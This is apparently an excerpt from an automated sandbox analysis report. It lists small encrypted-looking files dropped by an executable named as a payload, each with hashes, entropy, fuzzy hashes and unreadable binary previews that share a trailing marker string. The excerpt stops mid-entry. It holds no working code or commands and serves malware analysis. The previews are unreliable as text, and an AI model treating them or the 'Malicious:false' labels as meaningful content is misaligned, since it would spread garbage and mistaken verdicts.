                                                                                                MD5:C826DE0B2A29C771FEBBA6E3396BCB52
                                                                                                SHA1:0E86411B6F365C2D18D6B9796D9C55993AD4D83E
                                                                                                SHA-256:416C1DDA336CE4FF6D2A6182DED34B9DD773DEBCF9B9F5B4D88C8F8BAD15DC41
                                                                                                SHA-512:0C664DC3DF6328A5ED581241B59D25121093D4956CCCD4E3C0CCFD3594A35ACE891807E2AD0EDC8612802D83687FC10A8F5BC6C26083C5FC7C502EBE105FB088
                                                                                                Malicious:false
                                                                                                Preview:<?xml.g.Y8k\....m[.....S...m.h{.X..V.6.......:8....N..T...{_...j../...........`j.....?~......?.h.:....f.........G.g..8......,W.L..s)..O..@;..x^..7... ..phb..h..........DT.......K..4.....hem.R....>.....9.k..b.<.i...[.C.0..m...K..\....>.v].2.....*.......b.TF.......G.....R!6..,...........A...D:..4....vp.......o.e.n.qF.d.~N.~..u~*.a....{.v...*.`Q..>.b\h?B...=.w.u..OOX..u.c.y.wc....&...jQ......c.E.5/..|..l.l.....5.....B."........Ul.#...J...~.n.....M.G.73.$_dfT...h.."..[Q...*^..z.....R....N....A..].s.....b.P..E`./../...?..bQa.R.O_....z..s..l.-...#.u.*...r..."..3n%..{..#..#...w{.u.c....+7'1.....u..cr....3.r:R.i,sO.'.t|.w..'..}...PM.V..U.w.F..`.)%=..g`.....j .... .S$#.(....s.4*.QU.o+W.^....r.)g..........?7.inq.... 8.HI..4........?.A6...fs..f..8..i,.t..SPy...8uZ.....`.........f..?..C..[...Pm..M....Y..n......%...........w..svR)....K......"....}.....e>..v."a.~.Z.|?..z.....^!..m.ku ..^{.......1...M...N..aE....|.....U...<.@..U..^]....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):856
                                                                                                Entropy (8bit):7.709912385124348
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:c8AVp9dGmdA1swSfzH0MOvqrFBAnKICx3bD:MJGmyWNr0TvqZBAnKI2LD
                                                                                                MD5:FCD9275A6C774056E6D8B245CF63C2EE
                                                                                                SHA1:788B1A489B4BAB6E92661F88AD0AE42177E3904F
                                                                                                SHA-256:1C1776A416ADDE8977F293D0BB288ECE56901FB42BC4B072A50B4345DEF38D4B
                                                                                                SHA-512:BB7A56FDCBA85192051FBC7AD167E04C78B83817A1239D1ED0D418FCAB864EC44143958526AFA3765E0D78469E7CF7C28538F6BB2A0C9D3ACE1C8FEE1B8FBBE2
                                                                                                Malicious:false
                                                                                                Preview:<?xml..u.l.-Hxy.e.n.L..e<.#.....c..&U......d..&........[.we... X[...........4.5....4.lY..\.........X.e.^).YZ...54...2.....>.$>6..>b....I..xR...@kO.=+q...r....Wo....qU...?. .B.....[1tx.dJ.v-!f.[.\........J_s..7.2.....-w..]......*2g..U....*..RX.....'{f....#..8.h.._..,..._*.......f...U.....r+.........!..{..0.e.`B?xh.0BH....c.....4.L..._.....5...M.I..H.......X..."..^.....,....$...9Fp.UA..e_.)E}_...L.k...I54...#%....0M..c.k-`F...+.nI.R.....V...G.2/I@.......~...........j.....v.....8.....I.k.T....*....|&.s..P}O.l.}.I-}..8...h.).G....V.x.R...K..<...0...&...Fg/u..$.0,.g.A.k........8^a:.u....(N. L...N6.qS.....'.|x.Y.i....).bL....9jjH....%.(..-.&@...J.O.\..."...w.w..c...Y....PK.'...>j..eo.m..K..+~.9...C..e#.-im.N...:-9{K~v......B...!.N.).BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1084
                                                                                                Entropy (8bit):7.786570861690076
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:fv8O1mctqeSCD77Sq40/ClgY6Xev5ZfwvsOYqibh5d3uEdboJmx3bD:f5mkGq4GClgvA2vfY5dT+0boJKLD
                                                                                                MD5:9A72A8A4CE5C377B2132350A158AEC80
                                                                                                SHA1:DB1F9D3DD054D0A21F0288D6A3EB814A7DC012B6
                                                                                                SHA-256:1CB9EB83C3F775BEC96FB354DD87C78EAF77B26AFC7F371BEE5265F40CAFB439
                                                                                                SHA-512:BFBF9E3BE702F4069213A0EB8539C3F28CC466824135CD6057B348EA182A8320714629373C05ABEC98B40513E8800F0117C819873CB8C6FC8B4173A84F02160B
                                                                                                Malicious:false
                                                                                                Preview:<?xml.x.m=.\t..(Mm.....S...~...'...d..~b....F.~:... .. .{.M0O.m.&..E'..E..L[...hA..F.6.Y;-.=..&Ja.....F......ca.).. C.n.a.n.'..v..O..B#.....z.......:.....to..a0..u....Tk.|..t.....x.%i..L.R.qwO..E.@E..@.f.},..wy9M...7S.."p...5..E..#U=x......XFR.{.^Tv........~...........#K..0.XZN&{..%k.E..,.V...z..G}.l.p...g.#.)....+.U..x[.eO7OT..(.$.l.X....O..?..8...y.l.t.2Q%hQ....w..P..<.=,....;..............@l.,.C.....HQ...q............g.".W..X.$c.K...J.\U..D+.C..k.M...N....tA&'....2*$Dn....C.....S[.?.~.}@j...JP8u......)>..r.~..r.O>.$yA...cL}......U.Y..t.r.QVx..K.)np..:..EV5..JW..m[..mg#.Q....x;...v...KH.;Jfo38#.n...>1.....3.#...8k.l.C.s......._...P^.....G......\>.PZ8.X1...)......T.t|...?.4....6=...`n-..$.........s........`.'-...,......~.>f...b@..KLC\.6..?6.E..f...d...f.a...z.d...N...Xw.6....;J.....yd<.y..m..)[........@.......zH..f.>..oB.L....c...L....4q...c*.......Ed9.R..A...5....<...*)...@d.gFv...<..SK..L.....7f....eq$f......DO.B'.l_.K....7?..R..(.Z....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):924
                                                                                                Entropy (8bit):7.758065359250985
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:UP9uFVop2dT0LtwFOGJJuAcY1D9Rhx3bD:U0FKp2dTOtQ15R7LD
                                                                                                MD5:8821F1AA867759ED6489933496831993
                                                                                                SHA1:BA7C174E17CD66BBFF382F6AF94DF384ACBEC25F
                                                                                                SHA-256:1DCF4D79D47FBEF2E59D75A97A84534CC2AF450F202143B4B01D6A1DA862F2F7
                                                                                                SHA-512:C677A7478D8039ED643DEACFA808205253AF6D2BBE06D04FEE30B1029FDA9D239B82CBDCDEBAD5DE18B5A80A3BFEFB138CC91FFFB83B2C3D6E325E79544C9F89
                                                                                                Malicious:false
                                                                                                Preview:<?xml...<~='Du.~R..u..k..E...@..>+VN........*Jr...=.....n....k.kW.`h.l.N....:./......Q+....%...&.N.!&.7.!Q!G...C.J...&>.:.G.^..1.hH...c..z...YE!.. .z7q..d8E...Qd...|a.^.5.Mq...7.@,.>n).^.y.4&o.....q6.5.k.<qv......:.B..e8.........'......o.Q. ..UUj...d9. .dw..M?Scn..7mx..9.. ...K!..7....."Tv..<..!."...$;..-?. ...+.K.\...@..<.@.O}|l.i]M..w.v......r.X^/..5..KCW.=..nma=}....c..zl.....\.rW.E~.r53......0..9.......ZX.Ix@..88....GM..\.:...W^.c...R.v1.A.7...v.....X.].2&....R..I..LkYU.X;.p.!..O..t.......R*....)8~g....5G.E..+n._....k...at.$?...._J.[..a#..w\..5c.a..q......s.....H.:..Z.......W...v=...a.C.B.-..s....u.G.B.&.l..h..[}t...P.`.V...F...0.(.2...y.9MSv.....SI..)p..\T.;+..M..s.i...j.......S.U..0.F.Z.._gm.....@...W...=Z.ME..x$<.D.#c_.....B.......3.$;.F..{..\}.ZA.....~...}2,q....=.......IRJ...*dD,..gj.=...]/U..pBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1090
                                                                                                Entropy (8bit):7.818500867667734
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:LmdkImCrDLAZcYo+X2rkEmer7FkgZdttqqaC7+nx3bD:LJy9YoPwrs7u/c+xLD
                                                                                                MD5:953DF4339A7105AE2D2BC4FF418CB99B
                                                                                                SHA1:B7AC7E6117DD015AF557498441735E21D9A591F1
                                                                                                SHA-256:E918FF83DCC029B3C348E04172A3A7DF0ADE1A3D7593D4532FEDDD1272730BE9
                                                                                                SHA-512:DBF733E4AE96AE7F2097CA50AD4DB87037882856C1C6F0064CF0D25202CBE53B4F91559F8EFCF54501278C409A4258B433D73A46B4DE2AA223BA73674D91027F
                                                                                                Malicious:false
                                                                                                Preview:<?xml...B..M-..O0.'$.q3C..L:'f..o........Y..i9...e.a.......'..Jcnh..&F......gF.....K9,.p..`.dz,hv..H.{.y..T.X../&..y.>.7.$.......Ck. ....<..n>.V.J.D7...x.-.RU{.Y..N..H,.W....9.....8)Z*K.V'.q..1IFT,....Z..:.*../.....@.H..Q.&{...P..A....]..6u.%@c.us.{].....A.j....#...v%.i...y....;...E.^R...3....&....0.....aH..o.[]..#....{......iW...Cn!.|d.+.&b.....+<....k..........er.u.......r.7. .....M%.&i...a.[.UYk...Sw*.....v.o.M..(...0....F.!..>.ll0....k.6p....)....u...`...,..5......T>.8-.....ia......1..,...u.0..jfH.C5G....o..."...k.......`......q....qS,..5Ms...../.;.p.N...oK<.`..#l.j..:R...D&.pI...s.j.}[..!...].b._r.@.....:......<0.._;.?..(2A.!....!c5G....Jw...jbj.B$a2l..2.(....1...J.......i{.....x..2....].^&...H7...z.... 6.u...,h..g..v..i7...>=6../.w.E[.....4......j.r|.|z[d.o.q..Y...k.+..G.t.4.=..JZ.].k...i.M.c...Fu.1.h=...;f.6iU....'.....M........oi...=..h.....g.....l....j.....okz......Eb*...C.~....wp.....m..-L..Z&.*.a...<...Q.H..Ts....../q.\R....|..b.d.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1090
                                                                                                Entropy (8bit):7.776039632535177
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:glw1/0D/GMuWRrPHPODeK6EHNaWq9AzylQXXsE/8x3bD:gGF0rVtv2D36wNab9AzYQXhoLD
                                                                                                MD5:63CF2E9E0D2F7946D5F219E10B7C1B4B
                                                                                                SHA1:C37E8F3041ACA707971C2CE684342F9F0FD485DB
                                                                                                SHA-256:7E84A8E7C737B48190094FE8E00026754F3BB2C786A86D793F80F1FB663B5B66
                                                                                                SHA-512:81DEF369F12A97D20983C0ED37F0DFE7EBC06DC90DACCC5E053890374204F17F800C8326252CA11BE80D6E4FBD2EE21205AD82A615606DC3994016DA4173BDF1
                                                                                                Malicious:false
                                                                                                Preview:<?xml_.*..dS..:.4TX].H..k.S.7...W:@..h.4...L...u P..~.S....>...h.,.....4..:..(..\......o...4....d.L....3.~F....m"(..C....lV.....fg....2.....*......E2...1/._..3.fp......U...qi...(....Q.........E.E..KO.~..w.#.......cP..I......7Bu......L..R }..`s....c...=...........sy..(.dV.FFc2I3..Sy_..q..E.9..~G/S..).....<..R<H4|S..T......H+..Uv.~."....@..|x..c9.GH_9...."r..2...li.7[..N.K.k.'.ot......s<b$T.w.8<./.5...... q...2....d/.2B..$ W....*.yE!.4..a......2..z...3...<&..FH...(Il..:..cVy%...X..$40v.8..</<...5I..d.S............`...7..........A .-..,.R}].a...<c.'g..%I.ilu..i.S47.=!......w.F.....}1.4A.U2..7..O{$..........|...D...*Q..IA..dU.........,..K...(.........2.-.~e.M.."..../......nS.aui..C.....?.u./...#....=g....[..`[.UX}.+.x.2*.......<.;...b.E..S.....,../...@..*......z._...8.M.s.....G4=2n......%..k(i...'.X.g.{..*A.....)..P...t.K.......l..D........^W.o...*....B.B.'.i4....3....5lS....*..:..{ j.,5V..r.."..AC.$..l3.V....j..-_t.ub..)^....&`L...Q....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1108
                                                                                                Entropy (8bit):7.812044861836576
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Y2c85fVVscMx4ugJJOAqESzq9+181gM6lZYgNsZ6Ix3bD:Y2c85tVsIuEwAqJzqs86M2YQsoELD
                                                                                                MD5:EB78BC1C6B13F8891C2263085CFC1DA6
                                                                                                SHA1:1F25FD4931509906B26B672BE361A8FAEB757F59
                                                                                                SHA-256:D08DE25A8182412616C9A35D35A584016667AC3B048B139F2752179424A04CAD
                                                                                                SHA-512:05FE378993637AC9AF404E2222D8DC37C19D3EFE8DC3CC47A0CC80AD1800E1C2946334E86DCAE3C7D7AE3367A2FFD679FC16378EBB2FC3DDA4D41AFB065703A5
                                                                                                Malicious:false
                                                                                                Preview:<?xmliu.^4.y.tbL..e..L5.9.N61.C5V..}.;.v..1.A..4.x...@a.Z|v.m..)....8...y..:....4].nZL..HY..... .....o.I..|.....R\c....>...Y..E.s.....UU..;.a...]..>...l~q...!....`.PU.3.)N(rwl.*/...w'#.0-Pr.....d.8M]<..F(...Y.r.[...l..2.......4..f....8|S...X..8@...dh..UF..G....9$...\...rxY.0...AW..)e.......*...QE..,-.C.m...9w..*..t..6.....w..Q..L.....Dvcw[.....F.TR.,.........P......r...?9.aw%.c...g.$..63...Q..:fd..S!j.5Oeg(.p~,..._......\...).........Jri.H.U#.d...&.......u......"{.a.......!.F..V.;.o..H;!P>s2..\.4[v7...\.b.PSTEi.f..z..A'..wg..p:.h...y.:.._...'.bY...R..=.b.I.M.....P1._.....T...K7.......5...X..t..N..).,69t."...y...Fp.o..k..m.auq.!./S.....;w]YJ..L......Jb...b4.t.S.-......1...l....:c.#.....;..N..E..k.x.....**C.4smt....x.S...YA.%..0.Li..+.....ie.z...$z.~..0&...Q..Z]...Jzh#...(v...y../`{d1.z...Q.b= @Gd-....U...h..t@.p.4.H.g.).~.....>....t..'...Z....S.w...x....a.....#...(.-.C...K..0G.6N...<7....J.\"..uu.4...."Tl...29........1.......y.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):934
                                                                                                Entropy (8bit):7.773696909505014
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:GkcwcsFUx4XMqWGnM86qnko74+UYLqNY6pskJx3bD:GZ8ueXMqh9ko7R2NnpXzLD
                                                                                                MD5:52B3103BC1F1DFAB043D723CB61EDEAE
                                                                                                SHA1:279D68AE2A701C47492FB1013ADD89846EA9726E
                                                                                                SHA-256:B68AAF71EBA807C3F41E4B1D69A065029323687492E5D4A62A9C4FE541572A4C
                                                                                                SHA-512:7113AB43BF1A70FF120C5CC08B094C1C0893390F865A976C58619548F153D2F9D68A7335BD71386EA89011A4B181E9C3EA69A611309F413AAFF6E36C3FE7A3DA
                                                                                                Malicious:false
                                                                                                Preview:<?xml...-..W...."U.f..............X .o}.4}[Z..(`.....{...Y.Q....P9....u=.....QL.....$VCD6....[.|....Q.F\...vX.0....;.......fk..(.22........_>..z...EW.&D..0.......$....G..(..6.?......s....2.?....Uu..w}.....tG.gDATJW;......xS....,.F.#,.GCd.x..Z#...n.X.l>/..H.....~...3q0D.....[.....c....-,9................U..VIQM2..)1].:..hqt..9....Y@\S._.;.o.3...Yg.+@A._..9.....[.:.k.....I...q.O..../.P\P..)....m7...,.28.....+...4..<V..tjN.<..8.....5.g.Yi....7.......%>(9.k.5.....Z6....p....=..........Qw.f....G..X..80.(.9..V5~U..dn.&....][Q,El......<b...}Ce...............O.L3.br..;*.....c.B.g.......aG.(..2..6?w....].cx$UIF........... .s.8.m.D............p.`..h2_.......%0.4&5\.z....N..[.L.x1K<..\.. ..]...*Bl...Ba.^s3........@.D...x).><...Rxy.H..lRs.?(/...Zd.....{~.....r.Q...(X...Azk.B..oq...b.X#q...m..'..(F.\..).BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1126
                                                                                                Entropy (8bit):7.807611015313284
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:K6+cGypsOAmQSGxfuz7rOcTWu9R+bSx3bD:WPyps9mJr/rOSWOtLD
                                                                                                MD5:B442721A5D3E780CF685D81C5D1E39B1
                                                                                                SHA1:90A71BB294C29560262E10746DBBB9687DA07B47
                                                                                                SHA-256:E98575F83716DE26620CF3C95F928818659C065E0C12444558160E6AAB7E8F71
                                                                                                SHA-512:6E539C6AD0394BF566D5A1093E840A487DEF689A06166B1AC386885D77063764BCBF96C8E67DA178268B4E736191AF679EA28ACD36E8ED62EEF76E6BFC2B6AA9
                                                                                                Malicious:false
                                                                                                Preview:<?xml.8.A4..#.-..4UH..3.ES5.....+....=.T.|#o.@..$..AR..cJm]..Ea3...1...m\..H9.@..@.....wi`d.........V`..|e$N.u9.@..&c[Q....=...a\t...lHj2...xLR.-.....Ls..tY..=..M.Q.N7.1.yR06).]....m@ti...CIF../r.T(.?.../t.q.Z1.......%..o.tX/z).7.`#u.....G.....U.;..$6.&....8.......>U.a.Se...A...4.....r.]$TO2 ..]V.......c.....-..$"....d.b.....Y..g...*NVl..v..g......F........9.f.ed..J..{d...r=.qI5.#...nI.........^}3...:.....9..G(......",n5b..]........`L.h. .-....9.h&.Y.!.i+9:...-..~v.W.....B...V.9Z+.5..3nn..D..C.]..18.@+9#.Dx.b..w4..].-.W.0Mi.~|..:...F......$b.....[..S.iR..g^....Q=:0H.Q...Q'.u...+...i.dQnRx..KE)....o.....W.P..._(..`3e....N.....wjj}W..?.+.FA.............a.NJ5wtJ..;.-...X,J......a.2b...K8.....r..K.0,.N..A.pb.l .y..1..r...9.....%...b++g...%U............5.N"..{..G?....t....B.+......W.{.;...J .e<.....rOq.df.........tF..*......"%..L.i........:...\...Aq../.,..c.e...<*z..s../)......P."&.2.d.P.....D-... .Y..z.:-..x....0.....~5q..@.l...U\.Z,.5..b.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1243
                                                                                                Entropy (8bit):7.8271235303070625
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:G0ubVQp3q4irSSs9VI4HBe0U25pcq8skQsS+dUUyeKXBpYR3m8fRcNU1x3bD:XIah/ierh5psskM+dUUyeKX3YRbVfLD
                                                                                                MD5:7277479D4C2116406C350B7CFA4A2AC0
                                                                                                SHA1:7F2EF3C8C1F58C961052831A1F65C6B8007DB6A3
                                                                                                SHA-256:D2C7C81A75493153C4C59C540C80E286AB2D8007FCCCA0A8F7027ACC701F437F
                                                                                                SHA-512:FD2DF36227CA68526E5FAB2033BF3A982E3EB584D61CE9D3E8F7D44361FC446E5E9CECC4B3B87F31CDC914D2800AA14D9A99C9AF4BEF42F1BE3175C724B31449
                                                                                                Malicious:false
                                                                                                Preview:<?xml.9.+.Y..{N.....g..A:...3....`..g...Z.........d..v.u...v..,..h...&7c...E.Rl...L.F|x...g..b.u.\i....hf9J..)..t....x......_r7........e.;.,^*............H.....#../h...b|......2.<(..........|{.7.7..(1.z.>..`w8OS.W...T4.........a.:}.y.l..GUD....}/u.".cf3..........a..Y..........m..k......tr...'Q.....?Ao..([?...i...._....d.P.3.Q.&UV.04.|.u..e(jb.NX....Dl2..r.p..+...v`./..0ok(..x.{...).......K.w..#)@...AS...hE...'z..>|..........m...1..pR.6X...."h7k>..@......wc,T.......W.,....*.R..].).tto[..m..L.6.VE`..a-B.@.~.J2.....f.....Edk.*..U..E....(.,}|.BY.....;:z..N..6..}......d.d..Uj.<...........~n._H.,.>PC.[..*.....D~M.>.Q.6K...gr..Kd{LA.{....,..h.\......Z...5..[.y...6z..^Y'....L..T.6.:...O.......y..:....j.....a.......K.v..h.f,.1..9..I.${P.I...S..o...;1.2....4Y.R..\..KC.......j%.X...1x/1.-..@..."k....*Yl..>....~.$.)=.E.|._..@y...=@..Y.:.......Q.... .z...N#0...hL...........'.!rf.{..K....z}A..j...a"N[..D..@}7q#.3..4Qij.}h..g..z.~x....}.}dO
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):871
                                                                                                Entropy (8bit):7.736028609063329
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:nNwtn1LTuk+ZPay0QJXrEn33xnEBrSQqD3BMGF4PGrgx3bD:nNwtn1LTuvFjmBnGeQqT5FwLD
                                                                                                MD5:5E355FFE7064B25EA2CF5D84835328EF
                                                                                                SHA1:2381A81FEFD24BBC371ECEEFC9A74114DE9CBB35
                                                                                                SHA-256:C5DC25237883FA0DE590EC464D9900E902101CB15C05714888817545708632C4
                                                                                                SHA-512:B82C21AED34FC5164FF595C4F2F7CC04D1C033A7985C856A2F476BCE62EB6451644561A2753F93B476B08ED231B6FB313AAB3E4171F5C997696D6FCA21B62B41
                                                                                                Malicious:false
                                                                                                Preview:<?xml.;.Y...cF...Xn...y.:..g.6.}_.|.".#.....X..upv+u9.7j.M.j.`G.....R..aHyr\.{.HS...+...$.N....r.8"..g..L\S.>..)'.!=...*. 8..YWEL.K...Q.....[...wC.Yn..6.I.......>..No...g..b.*....<. U.....5.....Q....{ c..b5<...........%.v..".S..r....4S.w.}..h..c1$..G..\!.........E%.......9...`..N.k.TDm..&.p.^..w\.^T.....92."...3..h.....A.NS-......r.".._*..&..B<.oG.?zX..?...<...n..r.<...`M."'>..R.|...fI..../.eu...u.nV..G.._,F#..**..`..,....9igQVE.#..........5......".AQ}Wo...e.>........Q..:..P.....O..]..aQ.az..@......-)6.,....|...R.p.....`K.aIx...E.4..l.<....q.kw....{.Z..T.6.......W.......,.U^.._.).x8F..Q.m.J.n.5..&...AOj.V.....r..:...]Z......A.cJ4!.l+7....SDR.H2%...`.....o..Zf9....A..x..^.m......AK..}.;..T.q._A.._.......3..2+))..LO.....*.n.8|..a..l)....i.dBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):866
                                                                                                Entropy (8bit):7.7532636289620225
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:IR9hxxBXzxbuE5c3i0OMsFn71/2Z1WUZkrx3bD:WxxB9bXqpOMsp710Wb1LD
                                                                                                MD5:65D8D1FC3EB447B49A4D06EB4DDE28EC
                                                                                                SHA1:890DE339C65D50238CCB94FD2546068393F07168
                                                                                                SHA-256:2845FDD555F26DFA9093982E3314CCF611C19D8605676F3351F3157163267DA0
                                                                                                SHA-512:5616E73B1F1F1314CE8440CCDAF1CDA2A1E80950A73BE12D72193CAB4319A01D094068459F4A1EC0B054E0D223DA739A64CD4A9D3480777B9572273DE6B1C7D3
                                                                                                Malicious:false
                                                                                                Preview:<?xml5;.{.f~............2..hP9......~&.[!M....XG..........:.'Z........+-..=...z\r({kc.>...-..U.3&<......O...W........M......u=..3....6...02T....L..Y.*...e...qL..uW..$.Jh3.!.(...|....o0Q...q.)8)...c... .~...Z.)r&....Y.... t....g....#6...........=:....z.G....tg.h.~H....5..[......j...9....m.....d..dG.W....8.8M#..T..{...K....w.V.QHk.r.|q!..G...K/?.rgi%Yg3. ....&A.F..}"W.....3~.Iy.JB.r.=.d(..}..w....3=..`*.{zv.....`o.F,.(..0.b:....=.~J....ge...p...V.Cw+o.F.Y.7x. .*.......+..ui.=.7..A..J..X.]...........x......'..Ql.....V....0.>cs...n.D.].V'.[(q..h..vG..9.!X..E..(x...3._3..+.G6.x-d.T.W..r.........H.9.#..q.6B..k.....0O.X.?.:...Q..V.fw7@....KX.#... N.41.V....".K..v....y.0.rI.Cjx.oB...bL.\...Tz*u}n.....(9^.....W.............."_.|E..C......LY..|=..}..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):860
                                                                                                Entropy (8bit):7.748449455353001
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:g3z637cO2akXoAmkIIVu9dqA6p9gsazXs5x3bD:g2AnaChVmqA6p9ldLD
                                                                                                MD5:7A5F0DC1BF644884CDD9D5C8638FAF13
                                                                                                SHA1:5FCACFEA147A5E67AD4A1F73CF73DCE8EB3E901E
                                                                                                SHA-256:7AEEC7AD4BC09E7ADCC55CE64EE62BDE613CAD113CCE930353FB9DB718C0AD61
                                                                                                SHA-512:5AD19F1DB71169B4A03816E92D93D6DDE34E9B15608697903966DCF714E3785AF62C2B338A648D43447DA1D70848FB153C1308AC4E4D1F733ECF944B0B0B0C2C
                                                                                                Malicious:false
                                                                                                Preview:<?xml]?y...3.iq..IG..7..k..Hd&"?..z.^e.hZ.......W...U'.HaX.p.o.?..LF..H..I).`.(..k.]..r.Rd.>i.....I[....uk.d.Rd9......Y*w..@...S.s...6....b..B.Z..b3....2.N!%.....?..m"..M..t%..&.0.o...I....{.(..v#.D.v.....i....M...Y1r..5..\m.+.T...../...6E...t.K...u...s.R..Yh...`...w..l\%....^...S...f.U...r..T..-%.....q...h...z....H...(..=S..Y.N........Df..-:c...J..A.2].{#..'dG.p...j....}...s.2Y...h.&....r......?..-....$..B..lx....}R...n.)~....."......B.V. 5..?v.'D'Q.yC.S|..1[=k.%5dtKh..)..}..-v.@q.aY/...?..Y..$.XB<ME~...B+.f.T...x&.5..h....8_...6.a..Cx..(4]|Fh..lm....];.2t......R..i...B..W.W...~...m..V<.;..xD.......oa.... ;.....{../.....!.[M4.>....J..1...5c8..'^R.l./.$j....jKR&32..Z..m.Gy.....9U..H....I.yF.6..6.....1w.e./J..%l...Z)...OC.a..o..Z[8.J;BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1057
                                                                                                Entropy (8bit):7.799244252389529
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:oUm0U1+8XBumGGEKe/1wz3/S/MaettakmjyloqiAx3bD:oB0s+8EmGGEBwbSEaeNtlzNLD
                                                                                                MD5:9042DA0777F60DBCBA94439B76FC8F71
                                                                                                SHA1:E15040FA942514C38703ED00A3A5D84FE44D5A66
                                                                                                SHA-256:F425E2062E1070A2EDA99BF13F7E395DA168A81A60ADED487D5F59022EE7077E
                                                                                                SHA-512:7F338209409A2F886DCBD72293D1BEEF756083951CCEF75DBBF60DA00CD90AD9B45B728C8AE6A565E3A9717918F3A1C1D9E90C198517E3AD66DB0553D1F3C835
                                                                                                Malicious:false
                                                                                                Preview:<?xml1.>2@._vq\rn....OQ.B.9....I)_V......Cy.;%1IG... .i..Gjz.P{T.TeGb..`?.Q..I..H.S(B.p%>.H;..R...v..._^..d....'.E.#.y....=.$g..Y9.}<.&kRqG.a;..Hw{++.,.G.Hg..P..jK.....Z..yHQ.N.....{...^.....~.k.........[.....|.<...Q.NJ(..&.!.X....F.M..{.l..`&.?...Yg.....3....O...d..q.1<,e..|..9....166\.........F.:%...0i.T....7.s..%....*...........D...Ju...........s.On.5G...m+=.x.n.lHD1..x.....?....};h..}/N].f...^..y../s.. ..&[.U.\.J@._W|.^PH{......G.>..F.7..........8:[.....kC.N4...CB.<#,........0..2S......#.@.!d....P2....S7j.Z.bn|~J#g...s....+...Rk..,....k<...t...>..Dg=....;.....*).#L.MIM/.%..[...F..,..l...s............"r..../8.Aw....,....*..8{.c..I{^......,.v.J...>.........E.<..7.....9..j_...l...TvJ...........:....-)..Pvnz#+/.c1.nf.w.9....yX.r..5RP[.k.}...-....m.%5z.c.X.U..a..cS=t..QC.:....+....k0...A...W.p...E....$..Dz.*#3....r..8I.:.j.........k.4....PI..l9.@..p"3...V.0.hh.gV.;...o'.}......G.....`_.3...4ME...+.,5.P..@.?R..W..P.`..BUcuB8PRg0LNi380axIJs
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):766
                                                                                                Entropy (8bit):7.700814860686742
                                                                                                Encrypted:false
